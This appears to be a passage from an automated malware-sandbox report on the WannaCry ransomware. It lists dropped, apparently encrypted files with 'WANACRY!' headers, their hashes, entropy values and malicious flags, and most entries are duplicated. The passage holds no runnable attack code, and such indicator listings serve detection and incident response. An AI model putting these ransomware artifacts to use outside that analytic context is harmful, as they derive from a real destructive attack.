                                                                              SSDEEP:768:CxSoCRGvEU9DgUzOdxs5hvsSTDDh1UU/b3ZN/Dw6InwE1YErdY5ocNv9B:WJCRqEU9DFzOdxMhvswDDhWUzJ56nwES
                                                                              MD5:C31B2D8FDD80EC84FE3A3D016A1ED223
                                                                              SHA1:A7ACF1D25AC2471096E5033B9A964D2263362F39
                                                                              SHA-256:0EDEAD059F3E00CAC48B29B68C34D1438052522985EAEBF0AA1E75B3DD510177
                                                                              SHA-512:5BE38D720A8C0B71A9425FB7F9FB5243F9A06CAD9240B43813FE08F0E3967D2885CE80AEDB4AD20653DF20D3A0DAAA0C81B4DEF6F0E85E79CE82993765AAF293
                                                                              Malicious:true
                                                                              Preview:WANACRY!....X..Z..ai.}Z../...?......]{P.L..x6h"1.7^.@...!.s..,.pr...`Y..<....+.B..mNJ. ..9X.Ml>a:.g....q...2......_[....6E..n.../..{.g.p...U.0<7.\(.;Qv....}+6.3.....e.O....\.d.4DXnW..S;..G.....t..~..e.v..G..9.40i.......F........V. .x7..2MR...J>..H......5.Q9..............f......j.v8.(...V...x.z/..&.{....A..AE.F.<......7B.g.y...b..v.+..M*3........u...U.M..i+T.....;...'.......-5...T.m...#h..X+~F.!c?...8.4.L....?h... ..Z....i8.D...b...3...K*...2.P....i.._.-.r...9.....z.......(.E..p.o.W.vy.B....j...O.{.&p....MF....f.....1..|b......e.R.....ZWk.g0.:...9.]..'s.^...5K^.YM.....=T...U5j.o......T.}/bJAYC{.0.+.hm-..v._..`.PEV.Q4'x...=#ZJ*.A[..)m..6.r.9.%..G.X.}....J_c......8....~..p.xc.C...N.%E&H.f.[..y.../.%u......PI.Ie[W..O$ b?...E.......F..6..s..v..U..^[.Nw[..6..${o...C..H..o.vH...q..%..p..b.>~r.+6]#.........".)...Q2..1.o1[.U....1..9.../...L..:.g.)@x.|...:..b..;...PX.Z...}jz....'.j.U.].....NX-.%...iW....].....58.SC....O....j.V...l....Ej.`...x{.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):22136
                                                                              Entropy (8bit):7.992945324936526
                                                                              Encrypted:true
                                                                              SSDEEP:384:e4XoLIXxTfcGOv2iY/k9qZCT8ezmCesKcGaz7uEm9ojNn88NaXk29z2EF0H2fNet:e4f5fcGg2pcf7zYsmagejiNX9ROWVet
                                                                              MD5:808CBC8144C0FF3EFF4E1659449BE7A5
                                                                              SHA1:36B697F3D0AC14491945ECA4945A99EB2262403A
                                                                              SHA-256:C87DB81C87F1AC1B935C4DB868E392F8BBFCCBE1F0E72E851345D1478E8BBF53
                                                                              SHA-512:F1C97674FB43AD51C6D4A8AF0A59DF23BE825EF589D80DF510DEB0A4A2A558FA98A8B372094E23EB69382F30D04D2CAB50152FC611E89F34DAD5672BF14260D9
                                                                              Malicious:true
                                                                              Preview:WANACRY!....+...9+..../.2.H..B2!OGb-v..Dq....SyB../.1....K{+..[.P..Z.1(..E....$.L)..:8.L.W.\..pa}....!..8...?6.a?..HPJ.....xI..nSi.x.#.o.[...51*o8U.g.G..B...(..U..M...c?.7.0k.%.+..8g.....A...o..`.G.{.i....i[G.,....`.6iN.%.....^.H.Y..h.j..#*../..d.>..:6))s....YU........r.y.6n.1.... F\T.o.6/X#.k....~..x....%..Y.....\.sr......E0...-..`...].0.@g....M'.l.&....XS.gq......e.>..`.E.{!7rN!...WM..|..{.G.%~.D.|...Z...f..@......N.6Y..'..o." ..yO.v.~....^....7.V....NX..R5........Z?.1..-q.....3>y...;..)....._F..`ylz....Fg.........U.Q.P...<...,..b:....dK.y...q..d..1Q. ..I.V..."H../V...H..K.Z..6...1>..}.} ..w..)..yO\.i._...!.).Y.3:o.L.....a.....N....L..D...t..)..Y%.1#..v:.0.y..>.A..I..v.rV.'...J...\.J.I..h}T.b._.."..@..g.A...}..........+.5..n...c..@;.......TT.R..'.{.W...Q....n.;..........p..e`6$.F.V./.C.(..jW...........XU37.o.H..3..D)...hh2.W...OOJ.q...i...{...`..g...K.....+............`..xn....mz.....Cx....=...../..v.V.&.b.....r...n..Q...J...WvPT.-El
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):22136
                                                                              Entropy (8bit):7.992945324936526
                                                                              Encrypted:true
                                                                              SSDEEP:384:e4XoLIXxTfcGOv2iY/k9qZCT8ezmCesKcGaz7uEm9ojNn88NaXk29z2EF0H2fNet:e4f5fcGg2pcf7zYsmagejiNX9ROWVet
                                                                              MD5:808CBC8144C0FF3EFF4E1659449BE7A5
                                                                              SHA1:36B697F3D0AC14491945ECA4945A99EB2262403A
                                                                              SHA-256:C87DB81C87F1AC1B935C4DB868E392F8BBFCCBE1F0E72E851345D1478E8BBF53
                                                                              SHA-512:F1C97674FB43AD51C6D4A8AF0A59DF23BE825EF589D80DF510DEB0A4A2A558FA98A8B372094E23EB69382F30D04D2CAB50152FC611E89F34DAD5672BF14260D9
                                                                              Malicious:true
                                                                              Preview:WANACRY!....+...9+..../.2.H..B2!OGb-v..Dq....SyB../.1....K{+..[.P..Z.1(..E....$.L)..:8.L.W.\..pa}....!..8...?6.a?..HPJ.....xI..nSi.x.#.o.[...51*o8U.g.G..B...(..U..M...c?.7.0k.%.+..8g.....A...o..`.G.{.i....i[G.,....`.6iN.%.....^.H.Y..h.j..#*../..d.>..:6))s....YU........r.y.6n.1.... F\T.o.6/X#.k....~..x....%..Y.....\.sr......E0...-..`...].0.@g....M'.l.&....XS.gq......e.>..`.E.{!7rN!...WM..|..{.G.%~.D.|...Z...f..@......N.6Y..'..o." ..yO.v.~....^....7.V....NX..R5........Z?.1..-q.....3>y...;..)....._F..`ylz....Fg.........U.Q.P...<...,..b:....dK.y...q..d..1Q. ..I.V..."H../V...H..K.Z..6...1>..}.} ..w..)..yO\.i._...!.).Y.3:o.L.....a.....N....L..D...t..)..Y%.1#..v:.0.y..>.A..I..v.rV.'...J...\.J.I..h}T.b._.."..@..g.A...}..........+.5..n...c..@;.......TT.R..'.{.W...Q....n.;..........p..e`6$.F.V./.C.(..jW...........XU37.o.H..3..D)...hh2.W...OOJ.q...i...{...`..g...K.....+............`..xn....mz.....Cx....=...../..v.V.&.b.....r...n..Q...J...WvPT.-El
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):39320
                                                                              Entropy (8bit):7.995650988186136
                                                                              Encrypted:true
                                                                              SSDEEP:768:RV71rkCSuHNI+IkQFP8gkyBkkSmGjmSosxyNSLPbY6BQnN:RB0GNI+IkQR8uGK7s8ejYqoN
                                                                              MD5:36A37F44540D876ECE03FDDDA239F246
                                                                              SHA1:B4C4A23B6C7BBC4FD0FE824D5CFC0B0DDDDFD945
                                                                              SHA-256:E7C65D1FA0FBAFC087BB12C4940414C41597660283A24CAC6BCC9303C344EB76
                                                                              SHA-512:A53036698FB4F08568A69A3115A324F0880B6BE0C4AB6BA2162D182CDCCD87BC1E370527A29BE38F1CE22E29D263E93986440AE24CBB505BA02EEC840611F92E
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........H..m>.$*..v.B...f..R...b8......;$.b....l......\.j.>".j.v.&.....u..Y."O.l.S{...AGG...C.HO.'r...r.....(&..W......>......9.^..\e..\...H..zZ...9..U....Uaw.E.._..Xi.....!WA.<...".U..s\`..y..V.u..N....z.d.....w>.\u.Py-...u..K.n9x.2......ER.w....r.......g...7...r?.......x....g.D .1.[...@..f.....r8C.....4..Z.O..q8S....G....d....].o.{...<... ...\yx*...w.Lg9.c...z...O..6.j5@..}..aW.=@i-_&.).93..MWD#'..|..*..@.)K.~...eo(..-\.pc..P..l...I.}Mc./~...1...M......yQ....(..(NT..m...z.r@k."S.....Y.1...&)....\x.<....gX._.Q.p._A.yg.4.....3.E.0IKD......>,L..."..+.R.Q...#....q5A..d3...H>uJ..5....H....D.....q....I2....N..P..9n3I..M.:......O{...4.PR...*lh5.VG:.t.u[....o.Q.. p.4........64.....n.z?i?TS.....~p..v.Xd$|.*-.O@`..._...,I.....Qs....:*.,.^;..W.5....x,....) ...j..K.eO:..K,.......`.....y\7......vB....T.0[c}.t...+&..&.+.......u....bQG............`1.....pw..C#..qaIT.N..6e.22.W...t)../.[.D.!.7.v....1o...E.T..B.f.../....:.5*?$...x..hW.y...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):39320
                                                                              Entropy (8bit):7.995650988186136
                                                                              Encrypted:true
                                                                              SSDEEP:768:RV71rkCSuHNI+IkQFP8gkyBkkSmGjmSosxyNSLPbY6BQnN:RB0GNI+IkQR8uGK7s8ejYqoN
                                                                              MD5:36A37F44540D876ECE03FDDDA239F246
                                                                              SHA1:B4C4A23B6C7BBC4FD0FE824D5CFC0B0DDDDFD945
                                                                              SHA-256:E7C65D1FA0FBAFC087BB12C4940414C41597660283A24CAC6BCC9303C344EB76
                                                                              SHA-512:A53036698FB4F08568A69A3115A324F0880B6BE0C4AB6BA2162D182CDCCD87BC1E370527A29BE38F1CE22E29D263E93986440AE24CBB505BA02EEC840611F92E
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........H..m>.$*..v.B...f..R...b8......;$.b....l......\.j.>".j.v.&.....u..Y."O.l.S{...AGG...C.HO.'r...r.....(&..W......>......9.^..\e..\...H..zZ...9..U....Uaw.E.._..Xi.....!WA.<...".U..s\`..y..V.u..N....z.d.....w>.\u.Py-...u..K.n9x.2......ER.w....r.......g...7...r?.......x....g.D .1.[...@..f.....r8C.....4..Z.O..q8S....G....d....].o.{...<... ...\yx*...w.Lg9.c...z...O..6.j5@..}..aW.=@i-_&.).93..MWD#'..|..*..@.)K.~...eo(..-\.pc..P..l...I.}Mc./~...1...M......yQ....(..(NT..m...z.r@k."S.....Y.1...&)....\x.<....gX._.Q.p._A.yg.4.....3.E.0IKD......>,L..."..+.R.Q...#....q5A..d3...H>uJ..5....H....D.....q....I2....N..P..9n3I..M.:......O{...4.PR...*lh5.VG:.t.u[....o.Q.. p.4........64.....n.z?i?TS.....~p..v.Xd$|.*-.O@`..._...,I.....Qs....:*.,.^;..W.5....x,....) ...j..K.eO:..K,.......`.....y\7......vB....T.0[c}.t...+&..&.+.......u....bQG............`1.....pw..C#..qaIT.N..6e.22.W...t)../.[.D.!.7.v....1o...E.T..B.f.../....:.5*?$...x..hW.y...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10712
                                                                              Entropy (8bit):7.982273047184044
                                                                              Encrypted:false
                                                                              SSDEEP:192:XobrUm73bqdLPQS9wMfOdLjkQHiYDBhxdJ4LepFzvT1apjB0/nV7UiTw73BAgwaa:Xo/Um73bULPB9wbLzCYzJ4LiRvBE0/n7
                                                                              MD5:20D979C5FADB13C7AF4B816DF32B04DC
                                                                              SHA1:B23717ACEA49A3DF43465EF8F1D52D3DEC35FBB7
                                                                              SHA-256:FA89032D52E1DCACBCD8F0E1A2C05CECFC53FB659BB1E79CA1AFC129286C70B4
                                                                              SHA-512:BF61EF4871BDE25280A7F9A94F9C936BFC2952A9D424E1A4B186397FBF9517179472B94EEDB14BAD5E93FED3D035B214524F77E79CEA40BD4380C1AAF47CB387
                                                                              Malicious:false
                                                                              Preview:WANACRY!........+.....R0.V....R1\..*c{.!;......(s.!.f.=....LAR..0!.}.9.:0w2$.0>5y....|.l...C.+$WY..... .2...zf 2g..-(:>........I....."..;>.#K]..a....+.iH.5..C,+&....o.=l..7..<;..........\..g..Mr.S.~9......Si.2`N.....%$?_`N.........^...9....3.L.!.XG.Ua...........(.......C.cz{...H*........}..[.'<vO.j:..x..S}..?...,..o..G....@.T...?.....h.D...v..rH)q.....~c..o.FV@.(.{..t.....`z.+.)L..b(....gw$..:...y....-.......@.S......zrE.p..O......k..3B-..]..=..k.nJ....9.u......A.]1..IJM...b.r;.3[.'7C..v.......8...=.....-..L.Tc.\....*H6...'......v...Z...2'..n../...i..]0v8...1<D...)......E.......E..l.(f..P..".. ...........-'.(..K..p....Q..f..h.J]A..Q...V.......<\...j5.N...?...@...m1........5^w9..YMH?.4...:.G...+J.]-@C...Sh.d...4.....t.~..V.H....VN7ml.2.~..>...E..u.4U...%..{..G'.._p./.M]..........N..G.d'......n<t?a-..E.....k_.d..g...6.b...P7CNc.U..F.T.3.8../.6z...S..@..$..Y..d................8`......u.0...S.......~....8..N2.L...s.z,....*M...2^...T.3z...!...r
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10712
                                                                              Entropy (8bit):7.982273047184044
                                                                              Encrypted:false
                                                                              SSDEEP:192:XobrUm73bqdLPQS9wMfOdLjkQHiYDBhxdJ4LepFzvT1apjB0/nV7UiTw73BAgwaa:Xo/Um73bULPB9wbLzCYzJ4LiRvBE0/n7
                                                                              MD5:20D979C5FADB13C7AF4B816DF32B04DC
                                                                              SHA1:B23717ACEA49A3DF43465EF8F1D52D3DEC35FBB7
                                                                              SHA-256:FA89032D52E1DCACBCD8F0E1A2C05CECFC53FB659BB1E79CA1AFC129286C70B4
                                                                              SHA-512:BF61EF4871BDE25280A7F9A94F9C936BFC2952A9D424E1A4B186397FBF9517179472B94EEDB14BAD5E93FED3D035B214524F77E79CEA40BD4380C1AAF47CB387
                                                                              Malicious:false
                                                                              Preview:WANACRY!........+.....R0.V....R1\..*c{.!;......(s.!.f.=....LAR..0!.}.9.:0w2$.0>5y....|.l...C.+$WY..... .2...zf 2g..-(:>........I....."..;>.#K]..a....+.iH.5..C,+&....o.=l..7..<;..........\..g..Mr.S.~9......Si.2`N.....%$?_`N.........^...9....3.L.!.XG.Ua...........(.......C.cz{...H*........}..[.'<vO.j:..x..S}..?...,..o..G....@.T...?.....h.D...v..rH)q.....~c..o.FV@.(.{..t.....`z.+.)L..b(....gw$..:...y....-.......@.S......zrE.p..O......k..3B-..]..=..k.nJ....9.u......A.]1..IJM...b.r;.3[.'7C..v.......8...=.....-..L.Tc.\....*H6...'......v...Z...2'..n../...i..]0v8...1<D...)......E.......E..l.(f..P..".. ...........-'.(..K..p....Q..f..h.J]A..Q...V.......<\...j5.N...?...@...m1........5^w9..YMH?.4...:.G...+J.]-@C...Sh.d...4.....t.~..V.H....VN7ml.2.~..>...E..u.4U...%..{..G'.._p./.M]..........N..G.d'......n<t?a-..E.....k_.d..g...6.b...P7CNc.U..F.T.3.8../.6z...S..@..$..Y..d................8`......u.0...S.......~....8..N2.L...s.z,....*M...2^...T.3z...!...r
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3176
                                                                              Entropy (8bit):7.946159013053513
                                                                              Encrypted:false
                                                                              SSDEEP:96:o5hF2fByup15eFt60vb61LGOm5y5Voyj4bu:qhF2fBR+dm1bj4bu
                                                                              MD5:FCD2B0980713455A2C13542A9DB7AD84
                                                                              SHA1:F42324EA70DD5DFB988A9E7DDBA6FA04E60E5B82
                                                                              SHA-256:2EFC4C80D3DA9D55131028215284AED7D9C58C2B7B802F3C0237B9149C132C47
                                                                              SHA-512:837D1C7E6CEBE4A2FC80504A1D0302E41A8EE565F564F3B5851BC73811E6BF2DAD8275441A5097A478BFD049DA706D64166E7BA76A9C4DCAD857D8A72D307613
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......:m...b......+..-... d.X.mRG....`..6.0.Ve.....RY..<.k....q...%.6..H\....[....1|.s..~....h..w.-F7...lE..*....c..^.X.W....)^Rd..L.e........^|"....O..f.'.-..+-....M.N..0..w.52 ..-...`...}~Q.B.....`y.u...U...zK.@..CEuO<.... $..i.t....S...z!.......A.......J.F..0...\3r0.U.s.-.....Ek.Hy...B.B..b.G.J..o....p.+m3"|.3...FD.#].9;.+Nse...i.F..5u.`.L.7]y.....l..>..u.U...].!4=...R..&M.9j.i.A-..g.5.Y.82...B...U.....$........./.....k,wlaS...e...eG....iO...ebj?C..;192I.6.?...n.....4.).1...]$.t....-Rq..&...+;...*D&T<.x..!...UWxA?.....B..-...KH..d......X.....*a..M...Y.m._....U.8@.....b.[......Zc....M. ......+...`]..E..<.0.NI.....7..\{8..2..x..D...........pL@..f.R..eh..w"Yl..5.S..;.?..;g..f...7J...?.tt8<.d.}F..x....G'.V.$..jb."....r.$uW.R..X...U*K..M.O.1]0H......p"Ws...ML....%....1.!....}kSJ...{...'.Y..B..%{.'.>,..r..x..K...+Xjt..(....`...9>S. =s3*M..H...S....Q....j..z..#d..M......l.........R......x.(m...u.0.(.v..={..#.].N>..)...9...P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3176
                                                                              Entropy (8bit):7.946159013053513
                                                                              Encrypted:false
                                                                              SSDEEP:96:o5hF2fByup15eFt60vb61LGOm5y5Voyj4bu:qhF2fBR+dm1bj4bu
                                                                              MD5:FCD2B0980713455A2C13542A9DB7AD84
                                                                              SHA1:F42324EA70DD5DFB988A9E7DDBA6FA04E60E5B82
                                                                              SHA-256:2EFC4C80D3DA9D55131028215284AED7D9C58C2B7B802F3C0237B9149C132C47
                                                                              SHA-512:837D1C7E6CEBE4A2FC80504A1D0302E41A8EE565F564F3B5851BC73811E6BF2DAD8275441A5097A478BFD049DA706D64166E7BA76A9C4DCAD857D8A72D307613
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......:m...b......+..-... d.X.mRG....`..6.0.Ve.....RY..<.k....q...%.6..H\....[....1|.s..~....h..w.-F7...lE..*....c..^.X.W....)^Rd..L.e........^|"....O..f.'.-..+-....M.N..0..w.52 ..-...`...}~Q.B.....`y.u...U...zK.@..CEuO<.... $..i.t....S...z!.......A.......J.F..0...\3r0.U.s.-.....Ek.Hy...B.B..b.G.J..o....p.+m3"|.3...FD.#].9;.+Nse...i.F..5u.`.L.7]y.....l..>..u.U...].!4=...R..&M.9j.i.A-..g.5.Y.82...B...U.....$........./.....k,wlaS...e...eG....iO...ebj?C..;192I.6.?...n.....4.).1...]$.t....-Rq..&...+;...*D&T<.x..!...UWxA?.....B..-...KH..d......X.....*a..M...Y.m._....U.8@.....b.[......Zc....M. ......+...`]..E..<.0.NI.....7..\{8..2..x..D...........pL@..f.R..eh..w"Yl..5.S..;.?..;g..f...7J...?.tt8<.d.}F..x....G'.V.$..jb."....r.$uW.R..X...U*K..M.O.1]0H......p"Ws...ML....%....1.!....}kSJ...{...'.Y..B..%{.'.>,..r..x..K...+Xjt..(....`...9>S. =s3*M..H...S....Q....j..z..#d..M......l.........R......x.(m...u.0.(.v..={..#.].N>..)...9...P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12392
                                                                              Entropy (8bit):7.984423230414165
                                                                              Encrypted:false
                                                                              SSDEEP:384:4lhQErCM8giyEK2C8wpVMwJjp3K2LYex7D:ghQTlVO/nMUMcD
                                                                              MD5:2575DFE5E84361AF3EF57A65FE753B25
                                                                              SHA1:4D922E7084E9914E1FB39AC2FDC219E6F9BE1DE4
                                                                              SHA-256:C0BFFD06F56360D477C267C1515E23D2714FFBE7248EB20FEDF66851A4C1E1B9
                                                                              SHA-512:2C02E2F824AD47FB3971BE6DB081B61BBDADDEB14AE9CD8947735F77DEBCF632C84F852952AFA316869EFB463F9B4271B2D0E49DBF7CF607E26F86CE37823EE2
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........f.M.#..nta.;..@ ....|.d.uz..>..=..t.)%.Nk.@...6.-..`.......W.G.[...%.....+.@..u.T.6...5......0......z...&.0~I..I..o.....e....K!.g..-.w..y..l#...j...BR.R.......'..G[...T......IR!(.'g&...V.~.lv.r.b`yS.j...$..... 8....LW..;...^Rk4..t..:.P"....O/.......K../...O..>.D...gAp...)u.p.....,..t.5yZ.'>.....}.$f...f....@.........X`.(...f3.....z.>G..e$.c.!.sz.@..a...n......@.9yK..j&...B..u.%`....D...O^.p......|..U....n..alz......E(...s....t...g..j..a?..X..B.p.8b..M.b...|....-N..N....>..I\4&..A....G...NXF:.[.+$........\.Llf.....(.V...SO..X.B..#9%..:.;.|...`.@Q...."G.Z4.^.....X.e.."#2.h......K5+vp- ...Q..BpNL.+.%.I..._a.1.F.U.,?.W..D.`~@...)...#?..2.I(.V..t[./...OT._2.m..2&....I&.....lg.7.B...0.}...$....C..rD.....I.&.i..bvT..x.@....[.g"..y;.....[.e.B......b..R..4....[...o.......h..-XI.....L.F....Jx.u.0jx1...P.r.v...0X..a..;H..,Q...@.}....!.........M..|.a-..~....3._.2..x..e.7x.Q.s....~..:.A....jn.8..1.....S\...._A*.6d...]>4O...Z[5ZQ..8PY
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12392
                                                                              Entropy (8bit):7.984423230414165
                                                                              Encrypted:false
                                                                              SSDEEP:384:4lhQErCM8giyEK2C8wpVMwJjp3K2LYex7D:ghQTlVO/nMUMcD
                                                                              MD5:2575DFE5E84361AF3EF57A65FE753B25
                                                                              SHA1:4D922E7084E9914E1FB39AC2FDC219E6F9BE1DE4
                                                                              SHA-256:C0BFFD06F56360D477C267C1515E23D2714FFBE7248EB20FEDF66851A4C1E1B9
                                                                              SHA-512:2C02E2F824AD47FB3971BE6DB081B61BBDADDEB14AE9CD8947735F77DEBCF632C84F852952AFA316869EFB463F9B4271B2D0E49DBF7CF607E26F86CE37823EE2
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........f.M.#..nta.;..@ ....|.d.uz..>..=..t.)%.Nk.@...6.-..`.......W.G.[...%.....+.@..u.T.6...5......0......z...&.0~I..I..o.....e....K!.g..-.w..y..l#...j...BR.R.......'..G[...T......IR!(.'g&...V.~.lv.r.b`yS.j...$..... 8....LW..;...^Rk4..t..:.P"....O/.......K../...O..>.D...gAp...)u.p.....,..t.5yZ.'>.....}.$f...f....@.........X`.(...f3.....z.>G..e$.c.!.sz.@..a...n......@.9yK..j&...B..u.%`....D...O^.p......|..U....n..alz......E(...s....t...g..j..a?..X..B.p.8b..M.b...|....-N..N....>..I\4&..A....G...NXF:.[.+$........\.Llf.....(.V...SO..X.B..#9%..:.;.|...`.@Q...."G.Z4.^.....X.e.."#2.h......K5+vp- ...Q..BpNL.+.%.I..._a.1.F.U.,?.W..D.`~@...)...#?..2.I(.V..t[./...OT._2.m..2&....I&.....lg.7.B...0.}...$....C..rD.....I.&.i..bvT..x.@....[.g"..y;.....[.e.B......b..R..4....[...o.......h..-XI.....L.F....Jx.u.0jx1...P.r.v...0X..a..;H..,Q...@.}....!.........M..|.a-..~....3._.2..x..e.7x.Q.s....~..:.A....jn.8..1.....S\...._A*.6d...]>4O...Z[5ZQ..8PY
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.164671365884512
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEgjUxcLv5c6GK+4nFvz7LYb2BPBoy57HgLYg5SEMn6XlXs:bkEjcrCRg5z7LYbmPqy5Hs58uXs
                                                                              MD5:6D27DF75D01F2232B37A01768F761F60
                                                                              SHA1:EF3DA93AFEC0CD7309B94492E2CA9044D0152CFD
                                                                              SHA-256:B20C92F2161CC281028693D28EBA17722206E1246912F0B2507B6AE8AFF1995D
                                                                              SHA-512:576095AC1A647FB248017E05C80C7704BD17726F122029E9B4B0B8C6D9D2C06D6E5DE6634980583578F52EEA236FA567B53CAADD1C7EACB78AB97ADF145076E4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....-.n.:.>.{.....f.z./..i......s.{.a{.Du....'bj..q.Y..n.:...{.%......B..~.9nf.[6'..L.....J.....WA,.C.....}.O.'.$.c..3oA....+r]..&.0g..0.';..."Nly...Q.~Mo...=VwN...')...8.E$.a....S.E....Dz.4....I..0z.....E...[K.'.M.V..x.J.^E....)...........{ ................i.o..\,...|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.164671365884512
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEgjUxcLv5c6GK+4nFvz7LYb2BPBoy57HgLYg5SEMn6XlXs:bkEjcrCRg5z7LYbmPqy5Hs58uXs
                                                                              MD5:6D27DF75D01F2232B37A01768F761F60
                                                                              SHA1:EF3DA93AFEC0CD7309B94492E2CA9044D0152CFD
                                                                              SHA-256:B20C92F2161CC281028693D28EBA17722206E1246912F0B2507B6AE8AFF1995D
                                                                              SHA-512:576095AC1A647FB248017E05C80C7704BD17726F122029E9B4B0B8C6D9D2C06D6E5DE6634980583578F52EEA236FA567B53CAADD1C7EACB78AB97ADF145076E4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....-.n.:.>.{.....f.z./..i......s.{.a{.Du....'bj..q.Y..n.:...{.%......B..~.9nf.[6'..L.....J.....WA,.C.....}.O.'.$.c..3oA....+r]..&.0g..0.';..."Nly...Q.~Mo...=VwN...')...8.E$.a....S.E....Dz.4....I..0z.....E...[K.'.M.V..x.J.^E....)...........{ ................i.o..\,...|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15032
                                                                              Entropy (8bit):7.9903531661645735
                                                                              Encrypted:true
                                                                              SSDEEP:384:D70wQYThHHdFxY34uA8SepUiaz5jceQmSbuqaiLo:DLR9F+vlp9adjfSKqO
                                                                              MD5:EBB8171D85D304139082F53E23F2A1AA
                                                                              SHA1:E6CCEF955F3D13D98393D27224B75EE672326A2E
                                                                              SHA-256:9081BC24A09F3EDCAD94B1E3C9D4B7530E5530D793A89A3DC5550DF7795FFE0D
                                                                              SHA-512:D91EA464BC28BD02B29CB9A65F220D507262F258192CD4B7C9CDC401E5174A79D134B58591BB0EE1B9A244C8B905D77F83889115F9DB3DF09A167554258B3A74
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....J..>(..."(.%I3H$..a..f4G....0....+4...:=.v8y.5....Sha....xPM..yu.n...xah..H.@.. ....)GK..".@...3....._...<x....C..PG./.......].w}9}'%.b..=...^._q...N.wL|..3&(.DgC.J...'.....9...8.m.*.ho....,G.p./#...8.w1j_-c".......|.%i.:.......'...^.0..B.\5..@.6.....9.........y...7..8).....;Q.4u.O.B..rc.gp....v..+..Z.w6H...'r...Sp1....Z......=MH..o.(...E,....C.xZ.....W.. .].M....+.rZ(x...+.>.F+...+.b.wo....v..U...[...{ ...k.$..N......u.~.\...Rr.o.v..;...c2'..\..z.q...rK.^].....|P..Q.Ds...O;?...Zf........6..IUi'58sh...&&j|.4......m."..U..NC...Y..{.....<.(.KT.#........){@!......!q.$.Es:j.K.........1..M3....%.....6.P....G...?2../.s.....*.p.Fj~D_..QyqG..O.#..).o.[.dO..b.;tl._............t5....L.:.N..X..a......0U.:*N....E.V....gG.Y..d........&..i{L_...R...V.}......T.f1.. .3...O.z....._%.!C.^...d...=G3./...5.G..4..>.)..g.J.......$~.$.....e`..h...U.l.......<E>j.!H.N\....(....{......|.A.;.$..+~.-...?y..]..M......."Or.V.....,.Z....5.7[......oA.. ....#.'./.Y/.i
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15032
                                                                              Entropy (8bit):7.9903531661645735
                                                                              Encrypted:true
                                                                              SSDEEP:384:D70wQYThHHdFxY34uA8SepUiaz5jceQmSbuqaiLo:DLR9F+vlp9adjfSKqO
                                                                              MD5:EBB8171D85D304139082F53E23F2A1AA
                                                                              SHA1:E6CCEF955F3D13D98393D27224B75EE672326A2E
                                                                              SHA-256:9081BC24A09F3EDCAD94B1E3C9D4B7530E5530D793A89A3DC5550DF7795FFE0D
                                                                              SHA-512:D91EA464BC28BD02B29CB9A65F220D507262F258192CD4B7C9CDC401E5174A79D134B58591BB0EE1B9A244C8B905D77F83889115F9DB3DF09A167554258B3A74
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....J..>(..."(.%I3H$..a..f4G....0....+4...:=.v8y.5....Sha....xPM..yu.n...xah..H.@.. ....)GK..".@...3....._...<x....C..PG./.......].w}9}'%.b..=...^._q...N.wL|..3&(.DgC.J...'.....9...8.m.*.ho....,G.p./#...8.w1j_-c".......|.%i.:.......'...^.0..B.\5..@.6.....9.........y...7..8).....;Q.4u.O.B..rc.gp....v..+..Z.w6H...'r...Sp1....Z......=MH..o.(...E,....C.xZ.....W.. .].M....+.rZ(x...+.>.F+...+.b.wo....v..U...[...{ ...k.$..N......u.~.\...Rr.o.v..;...c2'..\..z.q...rK.^].....|P..Q.Ds...O;?...Zf........6..IUi'58sh...&&j|.4......m."..U..NC...Y..{.....<.(.KT.#........){@!......!q.$.Es:j.K.........1..M3....%.....6.P....G...?2../.s.....*.p.Fj~D_..QyqG..O.#..).o.[.dO..b.;tl._............t5....L.:.N..X..a......0U.:*N....E.V....gG.Y..d........&..i{L_...R...V.}......T.f1.. .3...O.z....._%.!C.^...d...=G3./...5.G..4..>.)..g.J.......$~.$.....e`..h...U.l.......<E>j.!H.N\....(....{......|.A.;.$..+~.-...?y..]..M......."Or.V.....,.Z....5.7[......oA.. ....#.'./.Y/.i
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131672
                                                                              Entropy (8bit):7.998503396916599
                                                                              Encrypted:true
